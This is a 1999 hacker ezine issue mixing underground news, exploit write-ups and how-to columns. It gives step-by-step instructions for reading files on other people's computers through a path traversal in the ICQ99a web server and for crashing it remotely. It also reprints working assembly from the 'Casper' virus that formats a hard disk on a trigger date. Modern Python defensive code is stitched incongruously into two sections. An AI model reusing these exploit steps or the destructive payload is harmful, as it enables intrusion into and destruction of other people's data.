Antidote Volume: 2 Issue: 1 (May 99)

------------------------------

Well here is another ezine put out by Antidote. This is our 5th issue that has come out. We have over 300 subscribers so far and we hope to get more. Please keep in mind that this is an educational ezine in which we are not responsible for any information on here that you might use in the wrong and improper way. Also, please keep in mind that just because we 'print' this information, that doesn't mean that we made the thing or the exploit up. Most everything in this magazine is made by someone else and is received second hand (sent to us), and is printed/posted on here by us.

------------------------------

--=\\Contents\\=--

0.00 - Beginning
0.01 - What?
0.02 - Complaints
0.03 - Sending Articles
0.04 - FAQ
1.00 - News & Exploits
1.01 - Anonymous Surfing
1.02 - ICQ99a Security Glitches
1.03 - Intruder Alert '99
1.04 - eBayla Bug
1.05 - Cold Fusion Vulnerability
2.00 - Misc.
2.01 - Configuring HardDrives
2.02 - Basic UNIX Commands
2.03 - PBBSER's code column

------------------------------

--=\\0.00\\=--
--------------

0.01
--=\\What?\\=--

What is 'Antidote'? Well, we wouldn't say that Antidote is a hacking magazine, because that would be wrong. We don't claim to be a hacking magazine. All Antidote is, basically, is current news and happenings in the underground world.
We aren't going to teach you how to hack or anything, but we will supply you with the current information and exploits. Mainly Antidote is just a magazine for people to read if they have some extra time on their hands and are bored with nothing to do. If you want to read a magazine that teaches you how to hack etc., then you might want to go to your local bookstore and see if they carry '2600'.

------------------------------

0.02
--=\\Complaints\\=--

In our last issue we got a lot of complaints about the content. Well, this is not our fault now, is it? It might be in some ways, but you all have to submit things to us so we can post them in here and have better content and articles etc... For submitting and rules, please see 0.03 (Sending Articles).

------------------------------

0.03
--=\\Sending Articles\\=--

As many of you know, we are always open to articles/submissions. We will take almost anything that has to do with computer security. This leaves you open for:

-Protecting the system (security/securing)
-Attacking the system (hacking, exploits, flaws, etc....)
-UNIX (really anything to do with it...)
-News that has to do with any of the above....

The only thing that we really don't take is webpage hacks, like e-mailing us and saying "www.xxx.com" was hacked... But if you have an opinion about the hacks that is fine. If you have any questions about what is "acceptable" and not, please feel free to e-mail Lord Oak [lordoak@thepoison.org] with your question and he will answer it.

Also, please note that if we receive two e-mails with the same topic/idea then we will use the one that we received first. So it might be a good idea to e-mail one of us and ask us if someone has written about/on this topic, so that way you don't waste your time on writing something that won't be published. An example of this would be: If Joe sends me an e-mail with the topic being on hacking hotmail accounts on Thursday.
And then Bill sends us an e-mail on hacking hotmail accounts on Sunday, we will take Joe's article because he sent it in first. But keep in mind, we might use your article for the next issue! If you have something that you would like to submit to Antidote, please e-mail lordoak@thepoison.org or duece@thepoison.org and we will review the article and put it in Antidote (if we like it).

------------------------------

0.04
--=\\FAQ\\=--

Here are a lot of questions that we seem to receive a lot, or our "Frequently Asked Questions". Please read this before e-mailing us with questions, and if the question isn't on here or doesn't make sense, then you can e-mail us with your question.

> What exactly is "Antidote"?
See section 0.01 for a complete description.

> I find Antidote is not aimed at the beginner or does not teach you the basics, why is that?
Antidote is for everyone; all we basically are is a news ezine that comes out once a month with the current news, exploits, flaws and even programming. All of the articles that are in here are received second hand (sent to us) and we very rarely edit anyone's articles.

> I just found Antidote issues on your webpage, is there any way I can get them sent to me through e-mail?
Yes, if you go to www.thepoison.org/antidote there should be a text box where you can input your e-mail address. You will receive Antidote the second we release it and it will be sent as an attachment.

> If I want to submit something, are there any 'rules'?
Please see section 0.03 for a complete description.

> If I submitted something, can I remain anonymous?
Yes. Just make sure that you specify what information about yourself you would like to be published above your article (when sending it to us) and we will do what you say.

> I submitted something and I didn't see it in the current/last issue, why is that?
It could be that someone else wrote something similar to what you wrote and they sent it to us first.
If you sent us something and we didn't e-mail you back, then you might want to send it again because we probably didn't get it (we respond to all e-mails no matter what). We might use your article in future issues of Antidote.

> Can I submit something that I didn't "discover" or "write"?
Yes you can, we take information that is written by anyone regardless of whether you wrote it or not.

Well, that's it for our FAQ. If you have a question that is not on here, or the question is on here and you had trouble understanding it, then please feel free to e-mail lordoak@thepoison.org and he will answer your question. This FAQ will probably be updated every month.

------------------------------

--=\\1.00\\=--
--------------

1.01
--=\\Anonymous Surfing\\=--

A couple of weeks ago there was a message posted on alt.comp.virus claiming that the "anonymous" web surfing programs are insecure and are easily bypassed with various JavaScript writings. One of the flaws just refreshes the current page, 'killing' the proxy on your side and thus revealing your true IP address. The other one just 'pulls' your true IP address, but doesn't work in IE4. These flaws have been found in the following Anonymous Surfing Providers:

Anonymizer (http://www.anonymizer.com)
Bell Labs (http://www.bell-labs.com/project/lpwa)
Naval Research Laboratory (http://www.onion-router.net)
Aixs (http://aixs.net/aixs/)

Here is the coding for 'pulling' the true IP address from the 'victim's' computer. Though, it doesn't work with IE. This script can be viewed at: http://www.tiac.net/users/smiths/js/livecon/index.htm, with which we claim/have no affiliation. Here is the JavaScript, put this in the 'body' of your webpage to take off anonymous surfing:
-Lord Oak (submitted by)
lordoak@thepoison.org

------------------------------

1.02
--=\\ICQ99a Security Glitches\\=--

As most people know, ICQ99a comes with an HTTPD which has been found to be insecure. It has a lot of vulnerabilities, one of which allows you to access someone's computer (remotely) and another which will crash their ICQ99a. These vulnerabilities only work on versions 1700 or lower. How do you know if someone is running ICQ99a's HTTPD server? Well, when the user is online, look to the right of their nick-name, and if there is a little house next to it, then they are running it.

Here is how they work:

The first one allows you to get into someone's computer (remotely). This enables you to make any edits to their system you want. All you have to do is get the victim's IP number. You can do this by clicking on their nick-name and then going to "info". If they have it hidden, then you can go to: http://members.icq.com/number and then put your mouse over one of the links on their page and see where it is linking to; it should be something like: http://24.93.212.1/page.html Not necessarily that number, but any number. Now copy their IP address (from the link) and then all you have to do is go 'up' a couple of directories, which allows you to access their computer. The only thing is that they only allow .html files to be retrieved by your web browser. So, all you have to do is add a /.html/ to the URL and it will think that you are trying to process a .html file and it will let you view the directory. The URL should look something like this: http://127.0.0.1/.html/../../../../../../config.sys You can add as many /../ as you want to; each one will just take you 'up' one more directory.

The second one allows you to crash the user's ICQ99a. This one is easier than the other one. All you have to do is get the user's IP address (see the first one on how to get it) and then telnet to their IP on port number 80. It won't say anything after you are connected.
After you are connected, just type in an "Unknown String" or just a command that doesn't exist (ex: dfsdfh).

-Lord Oak (submitted by)
lordoak@thepoison.org

------------------------------

1.03
--=\\Intruder Alert '99\\=--

[copied from www.bonzi.com/intruderalert/ia99.htm]

Intruder ALERT '99 is a one of a kind Internet utility that can now notify you if someone is trying to break in to your computer, stop them dead in their tracks, and even build a visual map showing you the Intruder's ISP (Internet Service Provider), allowing you to visually see where the Intruder is located and report them! You can now browse the Internet with the comfort and security of knowing that no one from the Internet can access your computer without your knowledge or permission!

Every time you browse the Internet, send e-mail, or submit any private information to a web site, you broadcast your computer's unique IP Address over the Internet. With this IP address, someone can immediately begin trying to break into your computer without you even knowing it! Until now, there has been no way of telling if this has happened or any way of stopping it! Well not anymore!

Intruder ALERT Attack Log:
IntruderALERT '99 is more than just protection against Internet Intruders; it allows you to track down your Intruder's ISP (Internet Service Provider) contact information and report the attack. This allows you to contact the Intruder's ISP and make them aware that someone on their network has tried to attack your computer. In most cases, they have the power to find out who the Intruder is and prevent any future attacks. With the IntruderALERT '99 built in 'Attack Log', you can know the date, time, IP Address, and Port Number used by the Intruder in the attack.

Mapping of the Intruder's ISP Location:
Intruder ALERT '99 can actually track down and give you a visual map of your Intruder's ISP location, allowing you to see where your attacker came from!
This allows you to see where in the world your attacker is located. NOTE: This is a map of the ISP (Internet Service Provider) that the attacker is using to get their Internet access.

Built In Port Management:
Intruder ALERT has a built in "Port Manager" allowing you an extra level of security. You can customize the ports that Intruder ALERT will monitor to catch Intruders trying to break into your computer. This is very handy when you suspect someone is trying to hurt you.

The Easiest Way to Protect Your PC from Intruders!
IntruderALERT '99 is easy-to-use! Once installed, you can go about your work without a worry. It runs silently in the background protecting you. Every time you turn on your computer, IntruderALERT '99 starts working automatically, only leaping into action when suspicious connection attempts are made to your computer.

Windows Sources Magazine:
The feature article in the November, 1997 issue of Windows Sources Magazine titled "How to Practice Safe Browsing" reports the following: "Behind these headlines lie two fundamental concerns: fear that your browser will let a malicious or ill-behaved program corrupt data on your PC and fear that a loophole in your browser will give hackers access to your Web session so they can steal personal information while you're online. Both Microsoft and Netscape have gone to great pains to make you feel secure using their browsers, stressing the extremely small chance you'll fall prey to hackers. But neither company can anticipate every problem, so don't expect the headlines to stop anytime soon."

http://www.bonzi.com/intruderalert/ia99.htm

------------------------------

1.04
--=\\eBayla Bug\\=--

[copied from www.because-we-can.com]
[additions by Lord Oak]

This page describes a security problem that Blue Adept discovered with eBay's on-line auctions on March 31, 1999 (realaudio interview). The security hole allows eBay users to easily steal the passwords of other eBay users.
The exploit involves posting items for bid that include malicious javascript code as part of the item's description. When an unsuspecting eBay user places a bid on the item, the embedded javascript code sends their username and password to the malicious user by e-mail. From the victim's point of view, nothing unusual seems to have occurred, so they are unlikely to report/complain to eBay.

Once a malicious user knows the username/password of the victim's eBay account, she can assume full control of the account, including the ability to:

-create new auctions (automatically charging the victim's account),
-place bids in the victim's name,
-retract legitimate bids in the victim's name,
-change the victim's username/password, barring them from eBay,
-associate bogus negative/positive comments with an arbitrary seller,
-prematurely close an auction being run by the victim,
-insert the ebayla code into the victim's auction.
-(The code could be altered to do this automatically, which would constitute an ebayla virus).

The security problem is dangerously easy to take advantage of. A malicious user needs only to embed the javascript code into their description of an item for auction. A walk-through of the exploit demonstrates step-by-step how any user can steal eBay passwords.

Blue Adept notified eBay that a 'huge' potential security problem existed on March 31, 1999 and offered assistance (but as of April 18, 1999 has only received form letter KMM798062C0KM in reply). Information about the ebayla exploit is being made publicly available to speed the process of fixing the security hole.
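The defensive side of the eBayla problem, as an added example that is not from the original page, eBay or Blue Adept: the site let a seller's item description reach other users' browsers unfiltered, so any script in it ran with the bidder's session. The Python below keeps only a small allow-list of formatting tags and attributes, drops <script> and <style> together with their contents, drops every on* event handler, and keeps only links that start with a plain http(s) scheme, which is what shuts the javascript: and onerror routes an item description could use to run code. The tag and attribute lists, the safe-URL rule and the SAMPLE description are assumptions chosen for illustration.

```python
"""Allow-list HTML sanitizer for user-supplied auction descriptions.

Added example (not code from the original page, eBay or Blue Adept).
Everything below the imports is an assumption chosen for illustration.
"""
from html import escape
from html.parser import HTMLParser

ALLOWED_TAGS = {"b", "i", "u", "p", "br", "ul", "ol", "li", "a", "img", "font"}
ALLOWED_ATTRS = {
    "a": {"href"},
    "img": {"src", "alt", "width", "height"},
    "font": {"color", "size"},
}
VOID_TAGS = {"br", "img"}
URL_ATTRS = {"href", "src"}
SAFE_SCHEMES = ("http://", "https://")   # no javascript:, data:, vbscript: ...


def _safe_url(value):
    # Drop whitespace/control characters first: browsers ignore them, so
    # "java\tscript:" would otherwise slip past a plain prefix test.
    cleaned = "".join(ch for ch in value if ch.isprintable() and not ch.isspace())
    return cleaned.lower().startswith(SAFE_SCHEMES)


class _Sanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open_tags = []
        self.skip_depth = 0   # > 0 while inside <script>/<style>: drop their text too

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return            # unknown tag: drop the tag itself, keep its inner text
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()) or value is None:
                continue      # this also discards every on* handler and style=
            if name in URL_ATTRS and not _safe_url(value):
                continue
            kept.append(' %s="%s"' % (name, escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if self.skip_depth or tag not in self.open_tags:
            return
        # close any tags left open inside this one so the output stays well-formed
        while self.open_tags:
            top = self.open_tags.pop()
            self.out.append("</%s>" % top)
            if top == tag:
                break

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))

    def result(self):
        while self.open_tags:
            self.out.append("</%s>" % self.open_tags.pop())
        return "".join(self.out)


def sanitize_description(html_text):
    """Return html_text reduced to allow-listed tags and attributes."""
    parser = _Sanitizer()
    parser.feed(html_text)
    parser.close()
    return parser.result()


# Constructed sample: a description carrying the kinds of payload described above.
SAMPLE = ('<b>Mint condition!</b>'
          '<script>/* would post the bidder\'s login elsewhere */</script>'
          '<img src="x" onerror="alert(1)">'
          '<a href="javascript:alert(document.cookie)">details</a>'
          '<a href="http://example.com/pics">photos</a>')

if __name__ == "__main__":
    print(sanitize_description(SAMPLE))
```

The same pass has to run over every field that is echoed into another user's page (titles, feedback, profile text), not only descriptions, and it belongs on the server at render or store time, never in the client. For production a maintained sanitizer library is the better choice; the point of the hand-rolled version is to show that the safe rule is an allow-list on parsed tags and attributes, not a search for "<script>" in the raw text.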
Here is the current JavaScript code which is used to steal the user's/bidder's Username and Password:

http://www.because-we-can.com

------------------------------

1.05
--=\\Cold Fusion Vulnerability\\=--

[copied from http://www1.allaire.com/handlers/index.cfm?ID=8727&Method=Full]

Allaire Security Bulletin (ASB99-01)
Expression Evaluator Security Issues
Originally Posted: February 4, 1999

Summary

One of the sample applications installed with ColdFusion Server, the Expression Evaluator, exposes the ability to read and delete files on the server. Allaire has released a patch that will limit access to the Expression Evaluator to page requests made from the machine where it is installed. As an additional measure of protection, Allaire recommends that customers not install (or remove existing) documentation, sample code, example applications and tutorials on production servers and secure access to these files on workstations.

Issue

A range of sample code and example applications are provided with ColdFusion Server to assist customers in learning and using the product. Among these is an application called the Expression Evaluator, which is installed in the //CFDOCS/expeval/ directory. The Expression Evaluator lets users process expressions such as 1 + 1 to see how ColdFusion expression evaluation works. Used normally, the application is restricted to access from the local machine based on the 127.0.0.1 IP address. However, some pages in the Expression Evaluator can be accessed directly, exposing the ability to read and delete files anywhere on the server where the evaluator is installed.
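Both server-side mistakes in this issue, the ICQ99a HTTPD in 1.02 checking for ".html" on the raw URL and then following the ".." segments out of its directory, and the Expression Evaluator in 1.05 enforcing its 127.0.0.1 rule on some of its pages but not all, come down to applying a rule to something other than the canonical request. The gate below is an added example in Python, not code from ICQ, Allaire or the original page; the document root, the allowed extensions, the loopback-only prefix /CFDOCS/expeval/ and the page name sample.cfm are assumptions. It decodes and normalises the path first, refuses anything that still climbs above the root, and only then applies the extension rule and the loopback rule to the result, on every request.

```python
"""Request gate for a small embedded web server.

Added example, not code from ICQ, Allaire or the original page.  DOC_ROOT,
ALLOWED_EXT, LOCAL_ONLY_PREFIX and the request list are assumptions.
"""
import ipaddress
import posixpath
from urllib.parse import unquote, urlsplit

DOC_ROOT = "/srv/www"                    # assumed document root
ALLOWED_EXT = {".html", ".htm", ".cfm"}  # assumed "only these may be fetched" rule
LOCAL_ONLY_PREFIX = "/CFDOCS/expeval/"   # sample app that must stay loopback-only


def canonical_path(raw_url):
    """Decode and normalise the URL path. Returns None if it climbs above the root."""
    path = unquote(urlsplit(raw_url).path)
    path = unquote(path)        # second pass so %252e%252e cannot hide ".." from the check
    if "\\" in path or "\x00" in path:
        return None             # backslashes and NULs have no business in a URL path
    # Normalise the RELATIVE form: posixpath keeps unresolved ".." segments there,
    # whereas normpath on an absolute path would silently clamp them at "/".
    rel = posixpath.normpath(path.lstrip("/"))
    if rel == ".." or rel.startswith("../"):
        return None
    return "/" if rel == "." else "/" + rel


def authorize(raw_url, client_ip):
    """Return (True, filesystem path) or (False, reason); rules use the canonical path."""
    path = canonical_path(raw_url)
    if path is None:
        return False, "path traversal"
    # Extension rule on the last segment of the canonical path, not a substring of the URL.
    ext = posixpath.splitext(path)[1].lower()
    if path != "/" and ext not in ALLOWED_EXT:
        return False, "extension not allowed"
    # Loopback rule for the whole prefix, compared case-insensitively because the
    # Windows NT build in the bulletin serves from a case-insensitive filesystem.
    if path.lower().startswith(LOCAL_ONLY_PREFIX.lower()):
        try:
            if not ipaddress.ip_address(client_ip).is_loopback:
                return False, "restricted to local machine"
        except ValueError:
            return False, "bad client address"
    return True, posixpath.join(DOC_ROOT, path.lstrip("/"))


def naive_allows(raw_url):
    """The broken check from 1.02, kept for comparison: substring test on the raw URL."""
    return ".html" in raw_url


# Constructed requests mirroring the cases the text describes.
REQUESTS = [
    ("/page.html", "24.93.212.1"),
    ("/.html/../../../../../../config.sys", "24.93.212.1"),
    ("/%2e%2e/%2e%2e/autoexec.bat.html", "10.0.0.7"),
    ("/CFDOCS/expeval/sample.cfm", "10.0.0.7"),
    ("/CFDOCS/expeval/sample.cfm", "127.0.0.1"),
    ("/CFDOCS/expeval/../expeval/sample.cfm", "10.0.0.7"),
]

if __name__ == "__main__":
    for url, ip in REQUESTS:
        print("%-40s from %-12s naive=%-5s gate=%s"
              % (url, ip, naive_allows(url), authorize(url, ip)))
```

Running it shows naive_allows() accepting the /.html/../ request that the gate rejects as traversal, and the loopback rule holding for a dotted or differently-cased spelling of the restricted directory. The second unquote() is a deliberate trade-off: it closes the double-encoding route at the cost of mis-reading a literal "%" in a file name, which is acceptable for a gate that only decides allow or deny.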
Affected Software Versions

Cold Fusion Application Server 2.0 (all editions)
Cold Fusion Application Server 3.0 (all editions)
Cold Fusion Application Server 3.1 (all editions)
ColdFusion Server 4.0 (all editions)

What Allaire is Doing

Allaire has released a patch that modifies the Expression Evaluator so that all the pages in the Evaluator are restricted to access from the local machine where the Expression Evaluator is installed, based on the 127.0.0.1 IP address.

Download - ColdFusion Expression Evaluator Security Patch (Windows NT)
Download - ColdFusion Expression Evaluator Security Patch (Solaris)

What Customers Should Do

Customers should run the patch on all of their systems where the Expression Evaluator is installed.

http://www1.allaire.com/handlers/index.cfm?ID=8727&Method=Full

------------------------------

--=\\2.00\\=--
--------------

2.01
--=\\Configuring HardDrives\\=--

I wrote this text because the average computer user has no idea how to install a hard drive and partition it, and I thought it would prove useful, so you can be just like me and install as many as you want. Well, if you don't like this article, bitch at g0at@fuckme.com

So, here is what you need to do:

1) Turn off your PC and monitor
2) Remove the power cord from the back of your PC
3) Remove the screws from the back of your PC
4) Check the instructions that were shipped with the hard drive and set the jumpers to either Master without a slave, Master with a slave, or Slave. Copy on to a paper the drive type and the number of cylinders, heads, and sectors that is printed on the top of the drive; you will need this later on in the installation.
5) Mount the drive into the bay in the PC's case
6) Next check the controller board instructions for any switches or jumpers that may need to be set.
7) Attach the cables to the drive. There will be two cables, one with 40 wires, and one with 4 wires. On the cable with 40 wires (this is your IDE cable) one side will have a colored stripe; this is pin one.
Pin one on the hard drive is usually located on the side close to the connection for the power cable. It is possible to connect the cable backwards. To avoid this, look at the disk drive connectors for a space or line between pins 2 and 3. The ribbon side with the colored stripe goes on this side.
8) Attach the power cable, the cable with four wires, from the hard drive to the PC's power supply.
9) You are ready to replace the PC's cover and screws.
10) You will need to edit your CMOS table regarding your new hard drive. When you boot up your PC, you will see a key combination to run setup. At this point enter the cylinders, heads, and sectors that you copied down from the label on the drive. You should use autodetect in your setup if your CMOS allows.
11) Save and exit setup. Let your computer boot up. You are now ready to partition your hard drive.

*******************************Partitioning A Hard Drive*****************************************

1) Boot up your machine from your floppy drive with a bootable disk and type:

DIR X: [ENTER]

X being the letter that you have assigned the drive. If you see a README.TXT file or a similar file name, proceed with the instructions indicated in that file for installing your hard drive.

2) If you see the following error message: "Invalid drive specification", insert a disk that contains the DOS commands FDISK and FORMAT into drive A:. Do not low level format your hard drive. This was already done by the manufacturer at the factory. The FORMAT command that you will be giving in DOS is a high level format. At the A: prompt type FDISK x [Enter], and you will see the following screen:

MS-DOS Version 6.00
Fixed Disk Setup Program
(C) Copyright Microsoft Corp

Choose the following:

1. Create DOS partition or Logical DOS Drive
2. Set active partition
3. Delete partition or Logical DOS Drive
4. Display partition information

Enter Choice: [1]

Press Esc to exit FDISK

Current Fixed Drive: 1

1. Create Primary DOS Partition
2. Create Extended DOS Partition
3. Create logical DOS drive(s) in the Extended DOS partition

Enter Choice: [1]

For problems or help with this, please feel free to e-mail me at: oxidation@progenic.com and I will try to get back to you as soon as possible.

-oX1dation
oxidation@progenic.com

------------------------------

2.02
--=\\Basic UNIX Commands\\=--

This is a list of some basic *nix commands that should work on any Unix-flavour system. Keep in mind that not all the possible args are written for each command (just the most common ones in my opinion)... and you can find more about any command by typing 'man [command]'.

*** Super Common ***

ls: lists files and directories
  -a: lists all files
  -s: print with file size
  ls [directory]: lists contents of directory
dir: like ls
vdir: like ls... what 'ls' usually shows if you are in an ftp session
cd: change directory
cat: print the contents of a file to standard output
more: like cat except it pauses after each screenful until you press a char
less: like more except you can go down by line as well as by screenful, and go back up

*** Still Very Common ***

grep: searches a file for a string and prints out the line that contains it
find: searches for a file/directory... common usage: find / -name filetofind
cp: copy files
echo: echoes something back to you
  -e '\a': echoes a bell... can sometimes be used in place of sound
cc: C compiler. Usual usage: cc -o file file.c
date: prints date
gcc: GNU C compiler (better than cc in my opinion). Usual usage: gcc -o file file.c
g++: GNU C++ compiler. Usual usage: g++ -o file file.cpp
gzip: zips a file (.gz)
gunzip: unzips it
kill: kills a process
mail: shows what mail you have
mkdir: make a directory
mount: mounts a partition/harddrive, floppy, cdrom, etc... Check /dev/ for the right names if fd0, hda1, or cdrom don't work
  mount floppy (usually as root):
    mkdir /mnt/floppy
    mount /dev/fd0 /mnt/floppy
  mount windows partition (as root):
    mkdir /mnt/win
    mount /dev/hda1 /mnt/win
  mount cdrom (as root):
    mkdir /mnt/cdrom
    mount /dev/cdrom /mnt/cdrom
    (ignore messages about having to mount in read only mode)
mv: renames files
netstat: shows open network connections
pwd: shows current directory
sleep: pauses for desired amount of time... useful in programming in C: system("sleep 2");
su: change user/uid... typing just 'su' is the same as typing 'su root'
tar: an archiving utility
  -zxvf: automatically gunzips and untars a file (for .tgz's or .tar.gz's)
unzip: unzips files with .zip extensions

That's all for now. Feel free to email questions to the author of this (PBBSER) at pbbser@legionoot.hypermart.net and check out www.legionoot.cc for program releases or the LegionOOT Ezine, and http://Sek-Check.hypermart.net for security auditing for no money.

------------------------------

2.03
--=\\PBBSER's code column\\=--

Alright, a little intro now. This is my first code column in Antidote, although I wrote a tutorial in basic x86 asm for Antidote #1. Well, enough of the bullshit intro, here is this zine's code column. This is part of a virus taken from antionline's virus archive. And don't bother giving me shit about going to antionline, they've got a decent virus archive, and I actually like www.anticode.com but I do hate JP. Also, this is a _very_ dangerous portion of code if written into a program and run. It can potentially format your harddrive. This tutorial was written to show how you _could_ do something and is not instructions on how to actually do it. This is copied exactly from http://www.antionline.com/archives/virii/U/UTILITY.ASM so if you do something stupid with this it isn't my fault, it's either the writer of this virus or JP for posting it.
Here it is:

;****************************************************************************
;*                                                                          *
;* UTILITY.ASM - Manipulation Task Code For Casper The Virus.              *
;*                                                                          *
;* USAGE: Is automatically INCLUDED in the assembly of casper.asm           *
;*                                                                          *
;* DETAILS: Date Activated Hard Disk Destroyer.                            *
;* DATE: 1st April    DAMAGE: Formats Cylinder 0 of HD.                    *
;*                                                                          *
;****************************************************************************

        mov ah,2ah       ; DOS Get Date.
        int 21h
        cmp dx,0401h     ; 5th May.
        jne utilend
        mov ax,0515h     ;Format Cylinder, 15 Sectors.
        mov ch,0         ;Cylinder 0.
        mov dx,00        ;Head 0, Drive 80h.
        mov es,dx        ;Junk for address marks.
        mov bx,0         ;Junk....
        int 13h          ;Do It!
        int 20h          ;Exit
utilend:
        jmp entry3
        db "Hi! I'm Casper The Virus, And On April The 1st I'm "
        db "Gonna Fuck Up Your Hard Disk REAL BAD! "
        db "In Fact It Might Just Be Impossible To Recover! "
        db "How's That Grab Ya! "
entry3:

*** end of cut and back to PBBSER ***

Well, for something so simple this is pretty well commented, so I guess I don't have to provide too detailed an explanation. Now I like fun virii, whether they be without a payload or with a funny one, but formatting stuff just sucks. Now no one thinks 'Casper' is more elite because he added these few destructive lines of code. So why did he do it?!@@#$ If you can possibly answer that please email pbbser@legionoot.hypermart.net with your answer. Well, sorry this column didn't show you anything really useful or teach you much, but I thought that anyone involved in the h/p/c/v scene should know how blatantly 'gay' virii that format harddrives are.

Next issue the topic for this column is up to the readers. Email: pbbser@legionoot.hypermart.net with potential topics and I will try to do a tutorial on it. Also, if it is a language specific topic it must be either: C, C++, Perl, x86 Assembly, TCL, Batch or Bash Shell scripting, because those are the only languages I consider myself good enough to bother sharing knowledge in.
Also, if you have no creativity, vote for one of my ideas:

1. Com overwriting virii (Would be a good tutorial but has been done before multiple times... if you can't figure out codebreaker's tutorial, vote this)
2. Intro to C Sockets with lots of example source
3. Intermediate C Sockets (constructing packets & junk)
4. Win32 Assembly With Tasm5 (I have found no tutorials with matching working source, so vote this if you wanna learn assembly without going the long way I did)

------------------------------